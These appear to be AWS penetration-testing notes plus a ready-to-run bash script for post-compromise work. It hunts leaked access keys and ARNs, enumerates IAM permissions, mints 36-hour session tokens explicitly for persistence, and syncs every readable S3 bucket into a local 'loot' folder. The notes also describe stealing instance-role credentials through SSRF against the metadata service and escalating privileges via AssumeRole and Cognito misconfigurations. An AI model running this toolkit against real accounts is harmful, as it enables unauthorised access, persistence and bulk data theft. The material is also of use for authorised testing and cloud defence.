- Look for open S3 buckets: they may let you exfiltrate a large amount of data and/or find credentials in config files, backups and scripts.
- We are primarily looking for AWS access key IDs and secret access keys. Access key IDs are 20 characters beginning with `AKIA` (long-term IAM user keys) or `ASIA` (temporary STS keys); secret keys are 40 characters of base64-style text with no fixed prefix, so hunt for them next to an access key ID or a `secret` hint rather than by pattern alone (regexes are available online).
- We can sometimes reach the EC2 instance metadata service (169.254.169.254) through an SSRF vulnerability and read the instance role's temporary credentials from `/latest/meta-data/iam/security-credentials/<role-name>`. Caveat: IMDSv2 requires a session token fetched with a PUT request first, which blocks most GET-only SSRF.
- Regular application vulnerabilities: SSRF, outdated software, etc.
- Scour GitHub for artifacts tied to the target's AWS accounts, such as ARNs (Amazon Resource Names); an ARN also leaks the 12-digit account ID, the service and the resource name.
- Use the `get-session-token` command to ensure that if the permanent credentials are rotated, deleted or disabled, there will still be access to the environment: the temporary credentials remain valid until they expire, which for an IAM user is at most 36 hours (`--duration-seconds 129600`). If the user's policies require MFA, pass `--serial-number` and `--token-code`.
- Run the `list-user-policies`, `list-attached-user-policies` and `list-groups-for-user` commands to see what permissions are attached (then `list-group-policies` / `list-attached-group-policies` for each group).
- Look at CloudTrail logs to identify if there is anything interesting.
- In CloudTrail you may see that the compromised user has previously called `sts:AssumeRole` to obtain another role. If the user's policy allows `sts:AssumeRole` on a role whose trust policy names that user or account, assuming the role can yield more privileges (priv esc / lateral movement).
- If AWS Cognito is misconfigured to allow self sign-up of a new user (or an Identity Pool allows unauthenticated identities), an attacker can register, log in and obtain temporary AWS credentials for the authenticated (or unauthenticated) role.
- After compromising a user's account you can use a script such as andresriancho's enumerate-iam.py to brute-force the permissions available to the credentials; it calls the read-only list/describe/get APIs of each service and records which succeed. Caveat: every call lands in CloudTrail, so this is noisy.
- We can also check for quick privilege escalation opportunities using Rhino Security Labs' aws_escalate.py script, which tests for the well-known IAM privesc methods (e.g. `iam:CreateAccessKey` on other users, `iam:PutUserPolicy`, `iam:PassRole` combined with `lambda:CreateFunction`).
- Enumerate the buckets we have read access to (`aws s3 ls`), then `aws s3 sync` their contents to disk and grep the copy offline for credentials and configuration.
- Use the Security Token Service API (`aws sts get-caller-identity`) to learn which account, user or assumed role the current credentials belong to; it needs no IAM permission, so it works even for the most restricted principals.
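As an added example (not part of the original notes), a bash script that ties the steps above together: the access-key, secret-key and ARN finders for text pulled from GitHub or a synced bucket, an ARN parser, and the live STS/IAM enumeration, `get-session-token` persistence and bucket sync. It assumes the AWS CLI v2 is on PATH with valid credentials in the environment or a profile; the `sample_loot` text, the key IDs in it and the `./loot` directory are constructed for illustration and are not real.

```shell
#!/usr/bin/env bash
# Added example for post-compromise AWS enumeration; assumes AWS CLI v2 is installed.
# The constructed sample below stands in for a cloned repo or a synced S3 bucket.
set -u

sample_loot() {
    cat <<'EOF'
# config.py (constructed sample, keys are not real)
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
role_arn = "arn:aws:iam::123456789012:role/deploy-role"
export TMP_KEY=ASIAEXAMPLE123456789   # temporary STS key id
bucket: s3://corp-backups-prod
EOF
}

# Access key IDs are 20 chars: AKIA (long-term IAM) or ASIA (temporary STS) + 16.
find_access_key_ids() { grep -oE '(AKIA|ASIA)[0-9A-Z]{16}' | sort -u; }

# Secret keys have no prefix: a 40-char base64-style run on a line mentioning "secret".
find_secret_key_candidates() { grep -iE 'secret' | grep -oE '[A-Za-z0-9/+]{40}' | sort -u; }

# ARNs: arn:partition:service:region:account:resource (region/account may be empty).
find_arns() { grep -oE 'arn:aws[a-z-]*:[a-z0-9-]*:[a-z0-9-]*:[0-9]*:[A-Za-z0-9_/:.-]+' | sort -u; }

# parse_arn <arn>: prints "partition service region account resource" ("-" for empty region).
parse_arn() {
    local rest=${1#arn:} partition service region account
    partition=${rest%%:*}; rest=${rest#*:}
    service=${rest%%:*};   rest=${rest#*:}
    region=${rest%%:*};    rest=${rest#*:}
    account=${rest%%:*};   rest=${rest#*:}
    printf '%s %s %s %s %s\n' "$partition" "$service" "${region:--}" "$account" "$rest"
}

# export_session "<AccessKeyId><TAB><SecretAccessKey><TAB><SessionToken>" -> shell exports.
# The input is the one-line output of:
#   aws sts get-session-token --output text \
#       --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]'
export_session() {
    set -- $1   # default IFS splits on the tabs; tokens contain no whitespace
    printf 'export AWS_ACCESS_KEY_ID=%s\nexport AWS_SECRET_ACCESS_KEY=%s\nexport AWS_SESSION_TOKEN=%s\n' \
        "$1" "$2" "$3"
}

# Live enumeration of the current principal; only runs when invoked as: ./aws_enum.sh run
enum_identity() {
    local arn account name
    # sts:GetCallerIdentity needs no IAM permission, so it works for any valid credentials.
    arn=$(aws sts get-caller-identity --query Arn --output text)
    set -- $(parse_arn "$arn")
    account=$4; name=${5#user/}
    echo "[*] account=$account principal=$5"
    case "$5" in
        user/*)
            aws iam list-user-policies          --user-name "$name" --output table
            aws iam list-attached-user-policies --user-name "$name" --output table
            aws iam list-groups-for-user --user-name "$name" --query 'Groups[].GroupName' --output text |
            tr '\t' '\n' | while read -r g; do
                [ -n "$g" ] || continue
                aws iam list-group-policies          --group-name "$g" --output table
                aws iam list-attached-group-policies --group-name "$g" --output table
            done
            # Persistence: session credentials outlive a deactivated access key, for up to 36 h.
            export_session "$(aws sts get-session-token --duration-seconds 129600 \
                --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' --output text)"
            ;;
        *) echo "[*] not an IAM user (role/session credentials); skipping user policy enumeration" ;;
    esac
    # Buckets we can list: sync each one locally and run the finders above over ./loot.
    for b in $(aws s3 ls | awk '{print $3}'); do
        aws s3 sync "s3://$b" "./loot/$b" --no-progress
    done
    cat ./loot/*/* 2>/dev/null | find_access_key_ids
}

case "${1:-}" in run) enum_identity ;; esac

# Offline demo on the constructed sample:
echo "[demo] access key ids:"; sample_loot | find_access_key_ids
echo "[demo] secret candidates:"; sample_loot | find_secret_key_candidates
echo "[demo] arns:"; sample_loot | find_arns
```

The regexes are deliberately loose (an `AKIA` match inside a longer token is still reported), so treat hits as leads to confirm with `aws sts get-caller-identity` rather than as verified credentials. `aws s3 sync` of every listable bucket can pull a lot of data; check sizes with `aws s3 ls --summarize --recursive` first on an engagement with scope limits.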